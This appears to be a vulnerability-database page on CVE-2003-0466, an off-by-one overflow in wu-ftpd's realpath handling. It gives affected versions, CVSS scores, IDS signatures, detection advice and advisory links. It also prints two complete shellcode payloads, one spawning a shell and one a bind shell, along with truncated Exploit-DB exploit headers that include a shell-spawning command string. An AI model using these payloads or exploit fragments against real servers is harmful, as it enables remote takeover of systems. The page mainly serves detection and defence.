CVE-2003-0466
published 2003-08-27CVE-2003-0466: Off-by-one error in the fb_realpath() function, as derived from the realpath function in BSD, may allow attackers to execute arbitrary code, as demonstrated in…
PriorityP355critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
78.11%
99.5th percentile
Off-by-one error in the fb_realpath() function, as derived from the realpath function in BSD, may allow attackers to execute arbitrary code, as demonstrated in wu-ftpd 2.5.0 through 2.6.2 via commands that cause pathnames of length MAXPATHLEN+1 to trigger a buffer overflow, including (1) STOR, (2) RETR, (3) APPE, (4) DELE, (5) MKD, (6) RMD, (7) STOU, or (8) RNTO.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | mac_os_x | — | — |
| apple | mac_os_x_server | — | — |
| freebsd | freebsd | 4.0 – 5.0 | — |
| netbsd | netbsd | 1.5 – 1.6.1 | — |
| openbsd | openbsd | 2.0 – 3.3 | — |
| redhat | wu_ftpd | — | — |
| sun | solaris | — | — |
| wuftpd | wu-ftpd | 2.5.0 – 2.6.2 | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31
bytes↗
\xeb\x64\x5e\x31\xc0\x88\x46\x07\x6a\x06\x6a\x01\x6a\x02\xb0\x61\x50\xcd\x80\x89\xc2\x31\xc0\xc6\x46\x09\x02\x66\xc7\x46\x0a\xa1\x26\x89\x46\x0c\x6a\x10\x8d\x46\x08\x50\x52\x31\xc0\xb0\x68\x50\xcd\x80\x6a\x01\x52\x31\xc0\xb0\x6a\x50\xcd\x80\x31\xc0\x50\x50\x52\xb0\x1e\x50\xcd\x80\xb1\x03\xbb\xff\xff\xff\xff\x89\xc2\x43\x53\x52\xb0\x5a\x50\xcd\x80\x80\xe9\x01\x75\xf3\x31\xc0\x50\x50\x56\xb0\x3b\x50\xcd\x80\xe8\x97\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23
- →Detect FTP banner strings 'wu-2.6.0', 'wu-2.6.1', or 'wu-2.6.2' in the FTP 220 greeting — the exploit's own banner scanner checks for these exact strings to confirm a vulnerable target. ↗
- →Alert on FTP commands (STOR, RETR, APPE, DELE, MKD, RMD, STOU, RNTO) carrying path arguments at or exceeding MAXPATHLEN+1 (typically 1025 bytes on BSD/Linux), which is the trigger condition for the off-by-one overflow. ↗
- →Monitor for unexpected outbound TCP connections from the FTP server process to port 41254, which is the bind-shell port used by the FreeBSD-targeted shellcode payload. ↗
- →Detect the Linux exploit shellcode NOP sled + payload byte sequence starting with \x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80 in FTP command payloads (setuid/chroot-break/execve shellcode by Lam3rZ). ↗
- →Detect the BSD exploit shellcode byte sequence starting with \x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80 in FTP command payloads (Lam3rZ chroot() code rewritten for FreeBSD by venglin). ↗
- →Flag FTP sessions where a large number of MKD commands are issued in rapid succession with incrementally varying long directory names — this is the exploit's directory-creation loop used to stage the overflow path. ↗
- ·Statically linked programs embedding their own realpath() copy are not fixed by patching the C library alone and require rebuilding against a patched libc. ↗
- ·The vulnerability affects wu-ftpd versions 2.5.0 through 2.6.2; the exploit targets 2.6.0, 2.6.1, and 2.6.2 with platform-specific return addresses for RedHat Linux 6.x, FreeBSD 4.6.2-RELEASE, and OpenBSD 3.0. ↗
- ·The exploit uses 0xff byte doubling in the attack buffer construction to avoid path-separator issues; IDS signatures must account for this encoding when matching shellcode in FTP command streams. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vendor_redhat9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-7c4w-gm97-vgqq: Off-by-one error in the fb_realpath() function, as derived from the realpath function in BSD, may allow attackers to execute arbitrary code, as demons
ghsa_unreviewed·2022-05-03
CVE-2003-0466 [HIGH] GHSA-7c4w-gm97-vgqq: Off-by-one error in the fb_realpath() function, as derived from the realpath function in BSD, may allow attackers to execute arbitrary code, as demons
Off-by-one error in the fb_realpath() function, as derived from the realpath function in BSD, may allow attackers to execute arbitrary code, as demonstrated in wu-ftpd 2.5.0 through 2.6.2 via commands that cause pathnames of length MAXPATHLEN+1 to trigger a buffer overflow, including (1) STOR, (2) RETR, (3) APPE, (4) DELE, (5) MKD, (6) RMD, (7) STOU, or (8) RNTO.
Red Hat
security flaw
vendor_redhat·2003-07-31·CVSS 9.8
CVE-2003-0466 [CRITICAL] security flaw
security flaw
Off-by-one error in the fb_realpath() function, as derived from the realpath function in BSD, may allow attackers to execute arbitrary code, as demonstrated in wu-ftpd 2.5.0 through 2.6.2 via commands that cause pathnames of length MAXPATHLEN+1 to trigger a buffer overflow, including (1) STOR, (2) RETR, (3) APPE, (4) DELE, (5) MKD, (6) RMD, (7) STOU, or (8) RNTO.
Suricata
GPL FTP STOU overflow attempt
suricata·2010-09-23
CVE-2003-0466 GPL FTP STOU overflow attempt
GPL FTP STOU overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 21 (msg:"GPL FTP STOU overflow attempt"; flow:established,to_server; content:"STOU"; nocase; isdataat:100,relative; pcre:"/^STOU\s[^\n]{100}/smi"; reference:bugtraq,8315; reference:cve,2003-0466; classtype:attempted-admin; sid:2102390; rev:6; metadata:created_at 2010_09_23, cve CVE_2003_0466, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata
GPL FTP RETR overflow attempt
suricata·2010-09-23
CVE-2003-0466 GPL FTP RETR overflow attempt
GPL FTP RETR overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 21 (msg:"GPL FTP RETR overflow attempt"; flow:established,to_server; content:"RETR"; nocase; isdataat:100,relative; pcre:"/^RETR\s[^\n]{100}/smi"; reference:bugtraq,8315; reference:cve,2003-0466; reference:cve,2004-0287; reference:cve,2004-0298; classtype:attempted-admin; sid:2102392; rev:9; metadata:created_at 2010_09_23, cve CVE_2003_0466, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata
GPL FTP APPE overflow attempt
suricata·2010-09-23
CVE-2000-0133 GPL FTP APPE overflow attempt
GPL FTP APPE overflow attempt
Rule: alert ftp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL FTP APPE overflow attempt"; flow:established,to_server; content:"APPE"; nocase; isdataat:100,relative; pcre:"/^APPE\s[^\n]{100}/smi"; reference:bugtraq,8315; reference:bugtraq,8542; reference:cve,2000-0133; reference:cve,2003-0466; classtype:attempted-admin; sid:2102391; rev:12; metadata:created_at 2010_09_23, cve CVE_2000_0133, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata
GPL FTP RNTO overflow attempt
suricata·2010-09-23
CVE-2000-0133 GPL FTP RNTO overflow attempt
GPL FTP RNTO overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 21 (msg:"GPL FTP RNTO overflow attempt"; flow:established,to_server; content:"RNTO"; nocase; isdataat:100,relative; pcre:"/^RNTO\s[^\n]{100}/smi"; reference:bugtraq,8315; reference:cve,2000-0133; reference:cve,2001-1021; reference:cve,2003-0466; classtype:attempted-admin; sid:2102389; rev:9; metadata:created_at 2010_09_23, cve CVE_2000_0133, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Exploit-DB
WU-FTPD 2.6.2 - Remote Command Execution
exploitdb·2003-08-11
CVE-2003-0466 WU-FTPD 2.6.2 - Remote Command Execution
WU-FTPD 2.6.2 - Remote Command Execution
---
/*
**
** wu-ftpd v2.6.2 off-by-one remote 0day exploit.
**
** exploit by "you dong-hun"(Xpl017Elz), .
**
** Update:
** [v0.0.2] August 2, I added wu-ftpd-2.6.2, 2.6.0, 2.6.1 finally.
** [v0.0.3] August 3, Brute-Force function addition.
** [v0.0.4] August 4, Added FreeBSD, OpenBSD version wu-ftpd-2.6.x exploit.
** It will be applied well to most XxxxBSD.
** [v0.0.5] August 4, Remote scan & exploit test function addition.
** August 6, Cleaning.
**
*/
#define VERSION "v0.0.5"
#include
#include
#include
#include
#include
#include
#define DEBUG_NG
#undef DEBUG_NG
#define NRL 0
#define SCS 1
#define FAD (-1)
#define MAX_BF (16)
#define BF_LSZ (0x100) /* 256 */
#define DEF_VA 255
#define DEF_PORT 21
#define DEF_ANSH_LINUX 15
#define DEF_ANSH_FRBSD
Exploit-DB
WU-FTPD 2.6.0/2.6.1/2.6.2 - 'realpath()' Off-by-One Buffer Overflow
exploitdb·2003-08-06
CVE-2003-0466 WU-FTPD 2.6.0/2.6.1/2.6.2 - 'realpath()' Off-by-One Buffer Overflow
WU-FTPD 2.6.0/2.6.1/2.6.2 - 'realpath()' Off-by-One Buffer Overflow
---
// source: https://www.securityfocus.com/bid/8315/info
The 'realpath()' function is a C-library procedure to resolve the canonical, absolute pathname of a file based on a path that may contain values such as '/', './', '../', or symbolic links. A vulnerability that was reported to affect the implementation of 'realpath()' in WU-FTPD has lead to the discovery that at least one implementation of the C library is also vulnerable. FreeBSD has announced that the off-by-one stack- buffer-overflow vulnerability is present in their libc. Other systems are also likely vulnerable.
Reportedly, this vulnerability has been successfully exploited against WU-FTPD to execute arbitrary instructions.
NOTE: Patching the C library al
Exploit-DB
WU-FTPD 2.6.2 - Off-by-One Remote Command Execution
exploitdb·2003-08-03
CVE-2003-0466 WU-FTPD 2.6.2 - Off-by-One Remote Command Execution
WU-FTPD 2.6.2 - Off-by-One Remote Command Execution
---
/*
**
** wu-ftpd v2.6.2 off-by-one remote 0day exploit.
**
** exploit by "you dong-hun"(Xpl017Elz)
**
** Brute-Force function added.
**
*/
#define VERSION "v0.0.3"
#include
#include
#include
#include
#include
#include
#define DEBUG_NG
#undef DEBUG_NG
#define NRL 0
#define SCS 1
#define FAD (-1)
#define MAX_BF (16)
#define BF_LSZ (0x100) /* 256 */
#define DEF_VA 255
#define DEF_PORT 21
#define DEF_ANSH 11
#define GET_HOST_NM_ERR (NULL)
#define SIN_ZR_SIZE 8
#define DEF_ALIGN 4
#define GET_R 5000
#define DEF_NOP 64
#define DEF_STR "x0x"
#define HOME_DIR "/home/"
#define DEF_HOST "localhost"
#define DEF_COMM "echo \"x82 is happy, x82 is happy, x82 is happy\";" \
"uname -a;id;export TERM=vt100;exec bash -i\n"
/* ftpd handshake */
#def
Exploit-DB
WU-FTPD 2.6.2 - 'realpath()' Off-by-One Buffer Overflow
exploitdb·2003-08-02
CVE-2003-0466 WU-FTPD 2.6.2 - 'realpath()' Off-by-One Buffer Overflow
WU-FTPD 2.6.2 - 'realpath()' Off-by-One Buffer Overflow
---
// source: https://www.securityfocus.com/bid/8315/info
The 'realpath()' function is a C-library procedure to resolve the canonical, absolute pathname of a file based on a path that may contain values such as '/', './', '../', or symbolic links. A vulnerability that was reported to affect the implementation of 'realpath()' in WU-FTPD has lead to the discovery that at least one implementation of the C library is also vulnerable. FreeBSD has announced that the off-by-one stack- buffer-overflow vulnerability is present in their libc. Other systems are also likely vulnerable.
Reportedly, this vulnerability has been successfully exploited against WU-FTPD to execute arbitrary instructions.
NOTE: Patching the C library alone may not
Exploit-DB
FreeBSD 4.8 - 'realpath()' Off-by-One Buffer Overflow
exploitdb·2003-07-31
CVE-2003-0466 FreeBSD 4.8 - 'realpath()' Off-by-One Buffer Overflow
FreeBSD 4.8 - 'realpath()' Off-by-One Buffer Overflow
---
source: https://www.securityfocus.com/bid/8315/info
The 'realpath()' function is a C-library procedure to resolve the canonical, absolute pathname of a file based on a path that may contain values such as '/', './', '../', or symbolic links. A vulnerability that was reported to affect the implementation of 'realpath()' in WU-FTPD has lead to the discovery that at least one implementation of the C library is also vulnerable. FreeBSD has announced that the off-by-one stack- buffer-overflow vulnerability is present in their libc. Other systems are also likely vulnerable.
Reportedly, this vulnerability has been successfully exploited against WU-FTPD to execute arbitrary instructions.
NOTE: Patching the C library alone may not remov
ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2003-011.txt.aschttp://archives.neohapsis.com/archives/vulnwatch/2003-q3/0065.htmlhttp://download.immunix.org/ImmunixOS/7+/Updates/errata/IMNX-2003-7+-019-01http://isec.pl/vulnerabilities/isec-0011-wu-ftpd.txthttp://marc.info/?l=bugtraq&m=105967301604815&w=2http://marc.info/?l=bugtraq&m=106001410028809&w=2http://marc.info/?l=bugtraq&m=106001702232325&w=2http://marc.info/?l=bugtraq&m=106002488209129&w=2http://secunia.com/advisories/9423http://secunia.com/advisories/9446http://secunia.com/advisories/9447http://secunia.com/advisories/9535http://securitytracker.com/id?1007380http://sunsolve.sun.com/search/document.do?assetkey=1-77-1001257.1-1http://www.debian.org/security/2003/dsa-357http://www.kb.cert.org/vuls/id/743092http://www.mandriva.com/security/advisories?name=MDKSA-2003:080http://www.novell.com/linux/security/advisories/2003_032_wuftpd.htmlhttp://www.osvdb.org/6602http://www.redhat.com/support/errata/RHSA-2003-245.htmlhttp://www.redhat.com/support/errata/RHSA-2003-246.htmlhttp://www.securityfocus.com/archive/1/424852/100/0/threadedhttp://www.securityfocus.com/archive/1/425061/100/0/threadedhttp://www.securityfocus.com/bid/8315http://www.turbolinux.com/security/TLSA-2003-46.txthttps://exchange.xforce.ibmcloud.com/vulnerabilities/12785https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1970ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2003-011.txt.aschttp://archives.neohapsis.com/archives/vulnwatch/2003-q3/0065.htmlhttp://download.immunix.org/ImmunixOS/7+/Updates/errata/IMNX-2003-7+-019-01http://isec.pl/vulnerabilities/isec-0011-wu-ftpd.txthttp://marc.info/?l=bugtraq&m=105967301604815&w=2http://marc.info/?l=bugtraq&m=106001410028809&w=2http://marc.info/?l=bugtraq&m=106001702232325&w=2http://marc.info/?l=bugtraq&m=106002488209129&w=2http://secunia.com/advisories/9423http://secunia.com/advisories/9446http://secunia.com/advisories/9447http://secunia.com/advisories/9535http://securitytracker.com/id?1007380http://sunsolve.sun.com/search/document.do?assetkey=1-77-1001257.1-1http://www.debian.org/security/2003/dsa-357http://www.kb.cert.org/vuls/id/743092http://www.mandriva.com/security/advisories?name=MDKSA-2003:080http://www.novell.com/linux/security/advisories/2003_032_wuftpd.htmlhttp://www.osvdb.org/6602http://www.redhat.com/support/errata/RHSA-2003-245.htmlhttp://www.redhat.com/support/errata/RHSA-2003-246.htmlhttp://www.securityfocus.com/archive/1/424852/100/0/threadedhttp://www.securityfocus.com/archive/1/425061/100/0/threadedhttp://www.securityfocus.com/bid/8315http://www.turbolinux.com/security/TLSA-2003-46.txthttps://exchange.xforce.ibmcloud.com/vulnerabilities/12785https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1970
2003-08-27
Published